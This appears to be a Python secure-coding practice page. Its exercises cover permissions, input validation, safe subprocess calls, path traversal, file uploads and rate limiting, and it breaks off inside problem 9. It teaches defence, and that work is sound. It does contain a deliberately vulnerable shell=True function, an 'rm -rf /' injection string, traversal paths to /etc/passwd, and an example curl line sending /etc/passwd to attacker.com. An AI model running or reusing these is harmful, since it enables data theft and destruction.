Skip to main content

Python Secure Coding Patterns Practice Problems & Exercises

Practice: Secure Coding Patterns

11 problems · 4 Easy · 4 Medium · 3 Hard · 50–65 min
← Back to lesson

Easy

#1Principle of Least Privilege — Function PermissionsEasy
least-privilegepermissionsaccess-control

Demonstrate the principle of least privilege by showing that a read-only processor cannot write or delete files.

Solution
class FileProcessor:
    """Simulated file processor whose write/delete rights are fixed at construction.

    Nothing touches the filesystem: reads return a placeholder string and
    every permitted operation is only recorded in an in-memory audit log.
    """

    def __init__(self, read_only: bool = True) -> None:
        # Read-only is the default, so write access must be requested explicitly.
        self.read_only = read_only
        self._log: list[str] = []

    def read_file(self, path: str) -> str:
        """Record the read and return placeholder contents for ``path``."""
        self._log.append(f"READ {path}")
        return f"<contents of {path}>"

    def write_file(self, path: str, content: str) -> None:
        """Record a write to ``path``; raise PermissionError when read-only."""
        if self.read_only:
            raise PermissionError(f"Processor is read-only — cannot write to {path}")
        self._log.append(f"WRITE {path}")

    def delete_file(self, path: str) -> None:
        """Record a delete of ``path``; raise PermissionError when read-only."""
        if self.read_only:
            raise PermissionError(f"Processor is read-only — cannot delete {path}")
        self._log.append(f"DELETE {path}")

    def audit_log(self) -> list[str]:
        """Return a copy of the log so callers cannot alter the record."""
        return list(self._log)


# The report generator only reads, so it gets a read-only processor.
report_gen = FileProcessor(read_only=True)
content = report_gen.read_file('/data/report.csv')
print(f"read ok: {content[:20]}")

try:
    report_gen.write_file('/data/report.csv', 'new content')
except PermissionError:
    print("write blocked: True")

# The archiver genuinely needs to write, so it is granted write access.
archiver = FileProcessor(read_only=False)
archiver.write_file('/archive/report.csv', 'archived content')
print(f"write ok: {archiver.audit_log()[-1]}")

Why least privilege matters: If the report generator is compromised (e.g., via a malicious CSV it reads), an attacker gains read-only access — not the ability to overwrite files or delete evidence. This blast radius limitation is the core value of least privilege. Apply it at every layer: DB users (SELECT-only roles), IAM roles (read-only S3 policies), API tokens (scoped to the minimum required endpoints).

# Demonstrate the principle of least privilege:
# A function should request only the permissions it actually needs.

class FileProcessor:
    """
    In-memory stand-in for a file processor with a fixed permission level.

    A processor built with read_only=True refuses write_file and delete_file
    by raising PermissionError. No real file is touched; permitted operations
    are only appended to an audit log.
    """

    def __init__(self, read_only: bool = True) -> None:
        self._log: list[str] = []
        self.read_only = read_only

    def _record(self, verb: str, path: str) -> None:
        """Append one '<VERB> <path>' entry to the audit log."""
        self._log.append(f"{verb} {path}")

    def read_file(self, path: str) -> str:
        """Log the read and hand back placeholder contents."""
        self._record("READ", path)
        return f"<contents of {path}>"

    def write_file(self, path: str, content: str) -> None:
        """Log a write, or raise PermissionError on a read-only processor."""
        if not self.read_only:
            self._record("WRITE", path)
            return
        raise PermissionError(f"Processor is read-only — cannot write to {path}")

    def delete_file(self, path: str) -> None:
        """Log a delete, or raise PermissionError on a read-only processor."""
        if not self.read_only:
            self._record("DELETE", path)
            return
        raise PermissionError(f"Processor is read-only — cannot delete {path}")

    def audit_log(self) -> list[str]:
        """Return a snapshot (copy) of the audit entries."""
        return self._log.copy()

# The report generator only ever reads, so it is built read-only.
report_gen = FileProcessor(read_only=True)
content = report_gen.read_file('/data/report.csv')
print(f"read ok: {content[:20]}")

try:
    report_gen.write_file('/data/report.csv', 'new content')
except PermissionError:
    print("write blocked: True")

# The archiver has to write, so write access is granted explicitly.
archiver = FileProcessor(read_only=False)
archiver.write_file('/archive/report.csv', 'archived content')
last_entry = archiver.audit_log()[-1]
print(f"write ok: {last_entry}")
Expected Output
read ok: <contents of /data/r
write blocked: True
write ok: WRITE /archive/report.csv
Hints

Hint 1: read_only flag gates write and delete — raise PermissionError immediately if the flag is set.

Hint 2: The report generator never needs write access — pass read_only=True explicitly.

Hint 3: Least privilege means the caller grants minimal permissions at construction, not relying on callers to "not call" risky methods.


#2Fail-Safe Defaults — Deny by DefaultEasy
fail-safedeny-by-defaultaccess-controlpermissions

Implement a permission check function that denies by default — access is granted only when explicitly listed.

Solution
PERMISSIONS: dict[str, set[str]] = {
    'alice': {'read', 'write'},
    'bob': {'read'},
}


def can_access(user: str, action: str, permissions: dict[str, set[str]]) -> bool:
    """Return True only when ``permissions`` explicitly grants ``action`` to ``user``.

    Fail-safe default: an unknown user or an unlisted action yields False.
    """
    user_permissions = permissions.get(user)
    if user_permissions is None:
        # Unknown user: deny rather than guess.
        return False
    return action in user_permissions


print(f"alice read: {can_access('alice', 'read', PERMISSIONS)}")
print(f"alice write: {can_access('alice', 'write', PERMISSIONS)}")
print(f"bob write: {can_access('bob', 'write', PERMISSIONS)}")
print(f"unknown read: {can_access('charlie', 'read', PERMISSIONS)}")
print(f"alice delete: {can_access('alice', 'delete', PERMISSIONS)}")

Fail-safe vs fail-open: A fail-open system grants access when it cannot make a decision (e.g., returns True on error). A fail-safe system denies. Fail-safe is almost always correct for security gates. The classic failure mode: a developer adds except Exception: return True to avoid breaking the auth flow — now every bug in the auth system grants full access. Deny on uncertainty.

from typing import Optional

PERMISSIONS: dict[str, set[str]] = {
  'alice': {'read', 'write'},
  'bob':   {'read'},
}

def can_access(user: str, action: str, permissions: dict[str, set[str]]) -> bool:
  """
  Return True only if the user is explicitly granted the action.
  Default: DENY (fail-safe).

  Exercise stub: the body is intentionally left for the reader, so as
  written it returns None.

  user:        name looked up in ``permissions``.
  action:      action name to test against that user's granted set.
  permissions: mapping of user name -> set of granted action names.

  The calls that follow expect False for a user missing from
  ``permissions`` and for an action missing from the user's set.
  """
  pass

# (label, user, action) in the order the expected output lists them.
checks = [
    ('alice read', 'alice', 'read'),       # known user, granted action
    ('alice write', 'alice', 'write'),     # known user, granted action
    ('bob write', 'bob', 'write'),         # known user, NOT granted action
    ('unknown read', 'charlie', 'read'),   # unknown user — must default to deny
    ('alice delete', 'alice', 'delete'),   # unknown action — must default to deny
]

for label, user, action in checks:
    print(f"{label}: {can_access(user, action, PERMISSIONS)}")
Expected Output
alice read: True
alice write: True
bob write: False
unknown read: False
alice delete: False
Hints

Hint 1: Check if the user exists in permissions first — if not, return False immediately.

Hint 2: Then check if the action is in the user's set — if not, return False.

Hint 3: There should be no code path that returns True by default.


#3Defense in Depth — Layered ValidationEasy
defense-in-depthlayered-securityvalidation

Chain four independent validation layers to demonstrate defense in depth for username validation.

Solution
import re

def layer1_type_check(value: object) -> bool:
    """Layer 1: the value must be a string."""
    return isinstance(value, str)


def layer2_length_check(value: str, max_len: int = 100) -> bool:
    """Layer 2: the value must be non-empty and at most ``max_len`` characters."""
    return 0 < len(value) <= max_len


def layer3_charset_check(value: str) -> bool:
    """Layer 3: only ASCII letters, digits, underscore and hyphen are allowed."""
    return bool(re.fullmatch(r'[a-zA-Z0-9_-]+', value))


def layer4_reserved_check(value: str) -> bool:
    """Layer 4: the value must not be a reserved word (case-insensitive)."""
    reserved = {'admin', 'root', 'system', 'null', 'undefined'}
    return value.lower() not in reserved


def validate_username(value: object) -> tuple[bool, str]:
    """Run the four layers in order and return ``(is_valid, reason)``.

    The reason names the first layer that failed, or ``'ok'`` when every
    layer passed.
    """
    if not layer1_type_check(value):
        return False, 'type check failed'
    # Narrowing for type checkers only; layer 1 already guarantees a str.
    assert isinstance(value, str)
    if not layer2_length_check(value):
        return False, 'length check failed'
    if not layer3_charset_check(value):
        return False, 'charset check failed'
    if not layer4_reserved_check(value):
        return False, 'reserved word'
    return True, 'ok'


tests = [
    ('alice', True, 'valid username'),
    (12345, False, 'not a string'),
    ('', False, 'empty string'),
    ('a' * 101, False, 'too long'),
    ('alice<script>', False, 'bad chars'),
    ('admin', False, 'reserved word'),
    ('valid-user_1', True, 'valid with special chars'),
]

for value, expected, label in tests:
    valid, reason = validate_username(value)
    status = 'PASS' if valid == expected else 'FAIL'
    print(f"{status}: {label} => {reason}")

Why independent layers: Each layer catches a different attack class. Charset check alone cannot catch reserved words; reserved word check alone cannot catch SQL-special characters. Defense in depth means no single fix must be perfect — the combination is robust. This is the same reasoning behind WAF + input validation + parameterized queries + ORM all coexisting.

# Defense in depth: apply multiple independent validation layers.
# If one layer fails or is bypassed, the others still catch the attack.

def layer1_type_check(value: object) -> bool:
    """Layer 1: accept only str instances."""
    is_text = isinstance(value, str)
    return is_text

def layer2_length_check(value: str, max_len: int = 100) -> bool:
    """Layer 2: reject empty values and values longer than max_len."""
    size = len(value)
    return size > 0 and size <= max_len

def layer3_charset_check(value: str) -> bool:
    """Layer 3: every character must be an ASCII letter, digit, '_' or '-'."""
    import re
    allowed = re.compile(r'[a-zA-Z0-9_-]+')
    return allowed.fullmatch(value) is not None

def layer4_reserved_check(value: str) -> bool:
    """Layer 4: reject reserved names, compared case-insensitively."""
    lowered = value.lower()
    for word in ('admin', 'root', 'system', 'null', 'undefined'):
        if lowered == word:
            return False
    return True

def validate_username(value: object) -> tuple[bool, str]:
  """
  Run all layers; return (is_valid, reason).

  Exercise stub: the body is intentionally left for the reader, so as
  written it returns None and the test loop below cannot unpack the result.

  The expected output pairs each failing case with one of the reasons
  'type check failed', 'length check failed', 'charset check failed' or
  'reserved word', and passing cases with 'ok'.
  """
  pass

# Each case: (candidate value, whether it should validate, label to print).
tests = [
    ('alice', True, 'valid username'),
    (12345, False, 'not a string'),
    ('', False, 'empty string'),
    ('a' * 101, False, 'too long'),
    ('alice<script>', False, 'bad chars'),
    ('admin', False, 'reserved word'),
    ('valid-user_1', True, 'valid with special chars'),
]

for candidate, should_pass, label in tests:
    ok, why = validate_username(candidate)
    if ok == should_pass:
        verdict = 'PASS'
    else:
        verdict = 'FAIL'
    print(f"{verdict}: {label} => {why}")
Expected Output
PASS: valid username => ok
PASS: not a string => type check failed
PASS: empty string => length check failed
PASS: too long => length check failed
PASS: bad chars => charset check failed
PASS: reserved word => reserved word
PASS: valid with special chars => ok
Hints

Hint 1: Call each layer function in order — return the failure reason on first failed layer.

Hint 2: Only return (True, "ok") if all four layers pass.

Hint 3: Each layer is independent: even if an attacker bypasses charset check, reserved word check still runs.


#4Input Length Limits — Prevent Oversized PayloadsEasy
input-validationlength-limitdos-prevention

Implement a length limit enforcer that validates string fields against defined maximums and returns structured errors.

Solution
from typing import Any

MAX_LIMITS = {
    'username': 64,
    'email': 254,
    'bio': 1000,
    'password': 128,
}


def enforce_length_limits(data: dict[str, Any], limits: dict[str, int]) -> dict[str, list[str]]:
    """Check string fields of ``data`` against per-field maximum lengths.

    Only fields named in ``limits`` are inspected; missing fields and
    non-string values are skipped. Returns a mapping of field name to a list
    of error messages, containing only the fields that exceeded their limit.
    """
    errors: dict[str, list[str]] = {}
    for field, max_len in limits.items():
        value = data.get(field)
        # A missing field comes back as None, which is not a str either.
        if not isinstance(value, str):
            continue
        if len(value) > max_len:
            errors.setdefault(field, []).append(
                f"{field} exceeds maximum length of {max_len} (got {len(value)})"
            )
    return errors


payload = {
    'username': 'a' * 65,
    # Placeholder address: the scraped page had an obfuscation marker here.
    'email': 'alice@example.com',
    'bio': 'x' * 1001,
    'password': 'correct',
    'extra_field': 'ignored',
}

errors = enforce_length_limits(payload, MAX_LIMITS)
for field, msgs in sorted(errors.items()):
    print(f"{field}: {msgs[0]}")

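Why length limits matter for security: Unbounded input enables ReDoS (catastrophic backtracking in regexes), stack overflows in recursive parsers, and resource-exhaustion DoS. A multi-megabyte password fed to a password hasher can tie up a CPU for a long time — Django's PBKDF2 hasher was hit by exactly this (CVE-2013-1443). Note that bcrypt's own cost does not grow with input length, because it only uses the first 72 bytes of the password; the risk lies in hashers and pre-processing steps that consume the whole input. Always enforce limits before doing any expensive processing (hashing, parsing, serialisation) on user-supplied data.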

from typing import Any

# Maximum allowed length, in characters, for each validated string field.
# Fields not listed here have no limit defined and are not checked.
MAX_LIMITS: dict[str, int] = {
  'username':   64,
  'email':     254,   # RFC 5321 max
  'bio':      1000,
  'password':  128,
}

def enforce_length_limits(data: dict[str, Any], limits: dict[str, int]) -> dict[str, list[str]]:
  """
  Validate string fields in data against limits.
  Return a dict mapping field name -> list of error messages.
  Only include fields that have errors.

  Exercise stub: the body is intentionally left for the reader, so as
  written it returns None.

  data:   submitted field values, keyed by field name.
  limits: maximum length per field name.

  The expected output shows messages of the form
  "<field> exceeds maximum length of <limit> (got <actual>)".
  """
  pass

payload = {
    'username': 'a' * 65,          # 1 over limit
    # Placeholder address: the scraped page had an obfuscation marker here.
    'email': 'alice@example.com',  # fine
    'bio': 'x' * 1001,             # 1 over limit
    'password': 'correct',         # fine
    'extra_field': 'ignored',      # no limit defined — skip
}

errors = enforce_length_limits(payload, MAX_LIMITS)
# Sorted so the report order is stable regardless of dict ordering.
for field, msgs in sorted(errors.items()):
    print(f"{field}: {msgs[0]}")
Expected Output
bio: bio exceeds maximum length of 1000 (got 1001)
username: username exceeds maximum length of 64 (got 65)
Hints

Hint 1: Only validate fields that appear in both data and limits — skip unknown fields.

Hint 2: Skip non-string values silently (or add a type error — your choice).

Hint 3: Build the errors dict by checking len(value) > limit for each applicable field.


Medium

#5Safe Subprocess with shlex and List ArgsMedium
subprocessshlexcommand-injectionsafe-exec

Demonstrate command injection in shell=True mode and implement a safe alternative using list-based subprocess arguments with input validation.

Solution
import subprocess
import re
from typing import Optional

def unsafe_run(user_filename: str) -> str:
    """VULNERABLE on purpose: interpolates the filename into a shell command.

    Kept only to demonstrate command injection — do not use in production.
    Returns the command's stripped stdout.
    """
    cmd = f"wc -l {user_filename}"
    # shell=True hands the whole string to the shell, metacharacters included.
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()

def safe_run(user_filename: str) -> tuple[str, int]:
    """Count lines of ``user_filename`` with ``wc -l`` without invoking a shell.

    Returns ``(stdout, returncode)``.

    Raises:
        ValueError: if the filename contains characters outside the
            whitelist (letters, digits, ``_``, ``.``, ``/``, ``-``) or starts
            with ``-``.
    """
    if not re.fullmatch(r'[a-zA-Z0-9_./-]+', user_filename):
        raise ValueError(f"Unsafe filename: {user_filename!r}")
    # The whitelist allows '-', so a name such as '--files0-from=x' would be
    # parsed by wc as an option (and a bare '-' as stdin) — reject those.
    if user_filename.startswith('-'):
        raise ValueError(f"Unsafe filename: {user_filename!r}")
    result = subprocess.run(
        # '--' ends option parsing: everything after it is an operand.
        ['wc', '-l', '--', user_filename],
        capture_output=True,
        text=True,
    )
    return result.stdout.strip(), result.returncode

# The injection payload is rejected before any process is started.
try:
    safe_run('report.txt; rm -rf /')
except ValueError:
    print("injection blocked: True")

# A well-formed path is passed to wc as a single argument.
output, code = safe_run('/etc/hosts')
print(f"safe run returncode: {code}")
print(f"output is string: {isinstance(output, str)}")

The shell=True trap: subprocess.run("wc -l " + filename, shell=True) passes the full string to /bin/sh -c. If filename is "report.txt; curl attacker.com -d $(cat /etc/passwd)", the shell executes both commands. With a list arg like ['wc', '-l', filename], the OS passes filename verbatim as an argument to wc — no shell parsing, no injection. shlex.split() is useful for parsing a trusted config string, not for making untrusted input safe.

import subprocess
import shlex
from typing import Optional

def unsafe_run(user_filename: str) -> str:
    """VULNERABLE: builds a shell command by string interpolation (shell=True)."""
    # DO NOT use in production — demonstrates command injection
    completed = subprocess.run(
        f"wc -l {user_filename}",
        shell=True,
        capture_output=True,
        text=True,
    )
    stdout_text = completed.stdout
    return stdout_text.strip()

def safe_run(user_filename: str) -> tuple[str, int]:
    """
    SAFE: Use a list of args (no shell=True).
    Validate that the filename contains only safe characters before running.
    Returns (stdout, returncode).
    Raise ValueError if filename contains dangerous characters or starts
    with '-' (which wc would parse as an option, or as stdin for a bare '-').
    """
    import re
    # Only allow: letters, digits, dash, underscore, dot, forward slash
    if not re.fullmatch(r'[a-zA-Z0-9_./-]+', user_filename):
        raise ValueError(f"Unsafe filename: {user_filename!r}")
    # The whitelist permits '-', so a leading dash must be refused separately:
    # avoiding the shell does not stop wc itself from reading it as an option.
    if user_filename.startswith('-'):
        raise ValueError(f"Unsafe filename: {user_filename!r}")
    result = subprocess.run(
        # '--' ends option parsing: everything after it is an operand.
        ['wc', '-l', '--', user_filename],
        capture_output=True,
        text=True,
    )
    return result.stdout.strip(), result.returncode

# The injection payload must be rejected before any process is started.
try:
    safe_run('report.txt; rm -rf /')
except ValueError:
    print("injection blocked: True")

# Run against a real path. The expected output assumes /etc/hosts exists
# (returncode 0); a missing file would give a non-zero returncode instead.
output, code = safe_run('/etc/hosts')
print(f"safe run returncode: {code}")
output_is_text = isinstance(output, str)
print(f"output is string: {output_is_text}")
Expected Output
injection blocked: True
safe run returncode: 0
output is string: True
Hints

Hint 1: The key safety is passing args as a list to subprocess.run — the OS does NOT invoke a shell.

Hint 2: shell=True passes the string to /bin/sh — semicolons, pipes, and backticks all work as shell operators.

Hint 3: Whitelist the filename with re.fullmatch before even building the arg list.


#6Path Traversal PreventionMedium
path-traversaldirectory-traversalfile-accesssecurity

Implement a path traversal-safe file reader that rejects any path resolving outside the upload directory.

Solution
import os
from pathlib import Path
import tempfile

def safe_read_file(user_provided_path: str, base_dir: Path) -> str:
    """Read a file that must live inside ``base_dir``.

    Both paths are resolved first (collapsing ``..`` and symlinks), and the
    containment check is done on path components rather than a raw string
    prefix.

    Raises:
        PermissionError: if the resolved path is outside ``base_dir``.
        FileNotFoundError: if the resolved path does not exist.
    """
    resolved = (base_dir / user_provided_path).resolve()
    base_resolved = base_dir.resolve()

    # Component-wise check: '/x/uploads_evil' is not inside '/x/uploads'.
    if not resolved.is_relative_to(base_resolved):
        raise PermissionError(f"Path traversal detected: {user_provided_path!r}")
    if not resolved.exists():
        raise FileNotFoundError(f"File not found: {resolved}")
    return resolved.read_text()


with tempfile.TemporaryDirectory() as tmpdir:
    base = Path(tmpdir) / 'uploads'
    base.mkdir()
    (base / 'report.csv').write_text('id,name\n1,alice')

    content = safe_read_file('report.csv', base)
    print(f"valid read: {content[:8]}")

    try:
        safe_read_file('../../etc/passwd', base)
    except PermissionError:
        print("traversal blocked: True")

    try:
        safe_read_file('../uploads/../../../etc/hosts', base)
    except PermissionError:
        print("encoded traversal blocked: True")

Why .resolve() is the fix: String-based checks like if '..' in path are trivially bypassable with URL encoding (%2e%2e), unicode variants, or extra slashes. Path.resolve() calls the OS path normalisation — it follows the same rules the filesystem uses. After resolving, a simple prefix check is reliable. Never do path security with string manipulation alone.

import os
from pathlib import Path

BASE_DIR = Path('/var/app/uploads')

def safe_read_file(user_provided_path: str) -> str:
  """
  Safely read a file within BASE_DIR.
  Prevent path traversal (../../etc/passwd style attacks).
  Raise PermissionError if the resolved path escapes BASE_DIR.
  Raise FileNotFoundError if the file does not exist within BASE_DIR.

  Exercise stub: the body is intentionally left for the reader, so as
  written it returns None.

  user_provided_path: untrusted path, to be interpreted relative to BASE_DIR.
  """
  pass

# Simulate the filesystem for testing
import tempfile, pathlib

with tempfile.TemporaryDirectory() as tmpdir:
    base = Path(tmpdir) / 'uploads'
    base.mkdir()
    (base / 'report.csv').write_text('id,name\n1,alice')

    def safe_read_file_test(user_path: str, base_dir: Path) -> str:
        """Variant of safe_read_file that takes the base directory explicitly.

        Raises PermissionError when the resolved path lies outside
        ``base_dir`` and FileNotFoundError when it does not exist.
        """
        base_resolved = base_dir.resolve()
        resolved = (base_dir / user_path).resolve()
        # Compare path components, not a raw string prefix: a prefix test
        # would accept a sibling such as '<parent>/uploads_evil'.
        if not resolved.is_relative_to(base_resolved):
            raise PermissionError(f"Path traversal detected: {user_path!r}")
        if not resolved.exists():
            raise FileNotFoundError(f"File not found: {resolved}")
        return resolved.read_text()

    # Valid access
    content = safe_read_file_test('report.csv', base)
    print(f"valid read: {content[:8]}")

    # Traversal attempt
    try:
        safe_read_file_test('../../etc/passwd', base)
    except PermissionError:
        print("traversal blocked: True")

    # Traversal that re-enters the upload directory before climbing out
    try:
        safe_read_file_test('../uploads/../../../etc/hosts', base)
    except PermissionError:
        print("encoded traversal blocked: True")
Expected Output
valid read: id,name
traversal blocked: True
encoded traversal blocked: True
Hints

Hint 1: Use Path.resolve() on the joined path — this collapses all .. components and symlinks.

Hint 2: Then check if the resolved path starts with BASE_DIR.resolve() as a string (or use .is_relative_to() in Python 3.9+).

Hint 3: Always resolve BASE_DIR too — if BASE_DIR itself contains symlinks, the check can be bypassed.


#7Safe File Upload ValidationMedium
file-uploadmime-typevalidationsecurity

Implement a file upload validator that checks extension, declared MIME type, magic bytes, and file size.

Solution
import os
from dataclasses import dataclass

@dataclass
class UploadedFile:
    """An uploaded file as seen by the validator."""

    filename: str
    content_type: str  # declared MIME type — supplied by the client, untrusted
    size_bytes: int
    content: bytes  # bytes inspected for the magic-number check


# Allowed MIME types mapped to the byte signatures a file may start with.
ALLOWED_TYPES = {
    'image/jpeg': [b'\xff\xd8\xff'],
    'image/png': [b'\x89PNG\r\n'],
    'application/pdf': [b'%PDF'],
}
MAX_SIZE = 5 * 1024 * 1024

# Accepted filename extensions and the MIME type each must be declared as.
EXTENSION_MAP = {
    '.jpg': 'image/jpeg',
    '.jpeg': 'image/jpeg',
    '.png': 'image/png',
    '.pdf': 'application/pdf',
}


def validate_upload(file: UploadedFile) -> tuple[bool, str]:
    """Validate an upload and return ``(is_valid, reason)``.

    Checks run in order and the first failure is reported: extension,
    declared content type, extension/content-type agreement, magic bytes,
    size. ``reason`` is ``'ok'`` when every check passes.
    """
    # 1. Extension check
    ext = os.path.splitext(file.filename)[1].lower()
    if ext not in EXTENSION_MAP:
        return False, 'file extension not allowed'

    # 2. Declared content_type must be allowed
    if file.content_type not in ALLOWED_TYPES:
        return False, 'content type not allowed'

    # 3. Extension must match content_type
    if EXTENSION_MAP[ext] != file.content_type:
        return False, 'extension does not match declared content type'

    # 4. Magic bytes must match
    magic_signatures = ALLOWED_TYPES[file.content_type]
    if not any(file.content.startswith(sig) for sig in magic_signatures):
        return False, 'magic bytes do not match declared content type'

    # 5. Size check
    if file.size_bytes > MAX_SIZE:
        return False, f'file exceeds maximum size of {MAX_SIZE} bytes'

    return True, 'ok'


jpeg = UploadedFile('photo.jpg', 'image/jpeg', 1024, b'\xff\xd8\xff' + b'fake jpeg data')
valid, reason = validate_upload(jpeg)
print(f"jpeg valid: {valid} — {reason}")

mismatch = UploadedFile('malware.exe', 'image/jpeg', 100, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(mismatch)
print(f"exe blocked: {not valid} — {reason}")

fake_png = UploadedFile('image.png', 'image/png', 100, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(fake_png)
print(f"fake png blocked: {not valid} — {reason}")

big = UploadedFile('big.jpg', 'image/jpeg', MAX_SIZE + 1, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(big)
print(f"oversized blocked: {not valid} — {reason}")

Why magic bytes matter: An attacker can rename exploit.php to photo.jpg. Checking only the extension or the HTTP Content-Type header is trivially bypassed — both are attacker-controlled. Magic bytes are the first N bytes of the actual file content, defined by the file format spec. They are harder to fake because the file must actually begin with those bytes. Use python-magic (libmagic binding) in production for robust detection beyond first-bytes heuristics.

import os
from dataclasses import dataclass
from typing import Optional

@dataclass
class UploadedFile:
  """An uploaded file as presented to validate_upload."""
  filename: str       # name of the upload; its extension is what gets checked
  content_type: str   # MIME type from HTTP header (untrusted)
  size_bytes: int     # size compared against MAX_SIZE
  content: bytes      # first few bytes for magic number check

# Allowed MIME types mapped to the byte signatures ("magic bytes") a file of
# that type may start with. Written as escapes: bytes literals must be ASCII.
ALLOWED_TYPES = {
    'image/jpeg': [b'\xff\xd8\xff'],
    'image/png': [b'\x89PNG\r\n'],
    'application/pdf': [b'%PDF'],
}
MAX_SIZE = 5 * 1024 * 1024  # 5 MB

def validate_upload(file: UploadedFile) -> tuple[bool, str]:
  """
  Validate an uploaded file:
  1. Extension must match allowed MIME types
  2. Declared content_type must be in ALLOWED_TYPES
  3. Magic bytes must match the declared content_type
  4. Size must be within MAX_SIZE
  Returns (is_valid, reason).

  Exercise stub: the body is intentionally left for the reader, so as
  written it returns None and the calls below cannot unpack the result.

  The expected output uses the reasons 'ok', 'file extension not allowed',
  'magic bytes do not match declared content type' and
  'file exceeds maximum size of 5242880 bytes'.
  """
  pass

# JPEG signature, written as escapes: bytes literals must be ASCII.
JPEG_MAGIC = b'\xff\xd8\xff'

# Valid JPEG (fake payload after the real signature)
jpeg = UploadedFile('photo.jpg', 'image/jpeg', 1024, JPEG_MAGIC + b'fake jpeg data')
valid, reason = validate_upload(jpeg)
print(f"jpeg valid: {valid} — {reason}")

# Extension mismatch
mismatch = UploadedFile('malware.exe', 'image/jpeg', 100, JPEG_MAGIC + b'data')
valid, reason = validate_upload(mismatch)
print(f"exe blocked: {not valid} — {reason}")

# Wrong magic bytes (claims to be PNG but has JPEG magic)
fake_png = UploadedFile('image.png', 'image/png', 100, JPEG_MAGIC + b'data')
valid, reason = validate_upload(fake_png)
print(f"fake png blocked: {not valid} — {reason}")

# Too large
big = UploadedFile('big.jpg', 'image/jpeg', MAX_SIZE + 1, JPEG_MAGIC + b'data')
valid, reason = validate_upload(big)
print(f"oversized blocked: {not valid} — {reason}")
Expected Output
jpeg valid: True — ok
exe blocked: True — file extension not allowed
fake png blocked: True — magic bytes do not match declared content type
oversized blocked: True — file exceeds maximum size of 5242880 bytes
Hints

Hint 1: Extract the extension with os.path.splitext(filename)[1].lower() and check it matches the MIME type.

Hint 2: For magic byte check, use content.startswith(magic) — any of the magic byte sequences for that MIME type.

Hint 3: Check size first (cheap) before doing magic byte inspection (requires reading bytes).


#8Token Bucket Rate LimiterMedium
rate-limitingtoken-bucketdos-preventionthrottling

Implement a token bucket rate limiter that tracks each user key independently.

Solution
import time

class TokenBucketRateLimiter:
    """Token-bucket rate limiter with one independent bucket per key.

    Each bucket holds at most ``capacity`` tokens and refills at ``rate``
    tokens per second; every allowed request consumes one token.
    """

    def __init__(self, capacity: int, rate: float) -> None:
        """capacity: maximum tokens per bucket; rate: tokens added per second."""
        self._capacity = capacity
        self._rate = rate
        # key -> {'tokens': current token count, 'last': time of last refill}
        self._buckets: dict[str, dict] = {}

    def allow(self, key: str) -> bool:
        """Return True and consume a token if ``key`` has one, else False."""
        now = time.monotonic()
        if key not in self._buckets:
            # A key seen for the first time starts with a full bucket.
            self._buckets[key] = {'tokens': self._capacity, 'last': now}

        bucket = self._buckets[key]
        elapsed = now - bucket['last']
        # Refill for the time elapsed since the last call, capped at capacity.
        bucket['tokens'] = min(self._capacity, bucket['tokens'] + elapsed * self._rate)
        bucket['last'] = now

        if bucket['tokens'] >= 1:
            bucket['tokens'] -= 1
            return True
        return False

# Bucket of 3 tokens per key, refilled at 1 token per second.
limiter = TokenBucketRateLimiter(capacity=3, rate=1.0)

# Three back-to-back requests use up user-1's tokens.
results = [limiter.allow('user-1') for _ in range(3)]
print(f"first 3 allowed: {all(results)}")

# NOTE: despite its name, `denied` holds allow()'s return value; the print
# negates it to report whether the 4th request was refused.
denied = limiter.allow('user-1')
print(f"4th denied: {not denied}")

# A different key has its own bucket.
allowed_other = limiter.allow('user-2')
print(f"user-2 allowed: {allowed_other}")

# Wait just over one second so user-1 regains at least one token.
time.sleep(1.1)
refilled = limiter.allow('user-1')
print(f"after refill allowed: {refilled}")

Token bucket vs fixed window: Fixed window counters (reset every 60s) allow burst attacks at window boundaries — 100 requests at 11:59:59, 100 more at 12:00:01, 200 total in 2 seconds. Token bucket smooths this: tokens accumulate gradually, so burst capacity is bounded by the bucket size. In production use Redis with Lua scripts for atomic token bucket operations across multiple app servers.

import time
from typing import Optional

class TokenBucketRateLimiter:
  """
  Token bucket algorithm:
  - Bucket holds up to 'capacity' tokens.
  - Tokens refill at 'rate' tokens per second.
  - Each request consumes 1 token.
  - If no tokens available, the request is denied.

  Exercise stub: both methods are intentionally left for the reader.
  """

  def __init__(self, capacity: int, rate: float) -> None:
      """
      capacity: max tokens; rate: tokens added per second.

      Stub: stores nothing yet; per-key bucket state must be set up here.
      """
      pass

  def allow(self, key: str) -> bool:
      """
      Check if a request from 'key' is allowed.
      Each key has its own bucket.
      Returns True if allowed, False if rate-limited.

      Stub: as written it returns None.
      """
      pass

limiter = TokenBucketRateLimiter(capacity=3, rate=1.0)  # 3 tokens, refill 1/sec

# Use all 3 tokens
results = [limiter.allow('user-1') for _ in range(3)]
print(f"first 3 allowed: {all(results)}")

# 4th request should be denied
denied = limiter.allow('user-1')
print(f"4th denied: {not denied}")

# Different key has its own bucket
allowed_other = limiter.allow('user-2')
print(f"user-2 allowed: {allowed_other}")

# Wait for refill and try again
time.sleep(1.1)
refilled = limiter.allow('user-1')
print(f"after refill allowed: {refilled}")
Expected Output
first 3 allowed: True
4th denied: True
user-2 allowed: True
after refill allowed: True
Hints

Hint 1: Store per-key state as (tokens, last_refill_time) in a dict.

Hint 2: On each allow() call, compute elapsed = now - last_refill and add elapsed * rate tokens (capped at capacity).

Hint 3: If tokens >= 1, deduct 1 and return True; else return False.


Hard

#9Security Middleware ChainHard
middlewaresecurity-headerscsrfrate-limitingchain

Implement a CSRF middleware and compose it with security headers and rate limiting into a complete security middleware chain.

Solution
from dataclasses import dataclass, field
from typing import Callable
import time

@dataclass
class Request:
    """Minimal request object passed through the middleware chain."""

    method: str
    path: str
    headers: dict[str, str]
    body: str = ''
    client_ip: str = '127.0.0.1'


@dataclass
class Response:
    """Minimal response object; each instance gets its own headers dict."""

    status: int
    body: str
    headers: dict[str, str] = field(default_factory=dict)


Handler = Callable[[Request], Response]


def security_headers_middleware(next_handler: Handler) -> Handler:
    """Wrap ``next_handler`` so every response carries the security headers."""
    def handler(req: Request) -> Response:
        resp = next_handler(req)
        resp.headers.update({
            'X-Content-Type-Options': 'nosniff',
            'X-Frame-Options': 'DENY',
            'Strict-Transport-Security': 'max-age=31536000',
        })
        return resp
    return handler


def rate_limit_middleware(next_handler: Handler, capacity: int = 5) -> Handler:
    """Per-client-IP token bucket; answers 429 when a bucket is empty."""
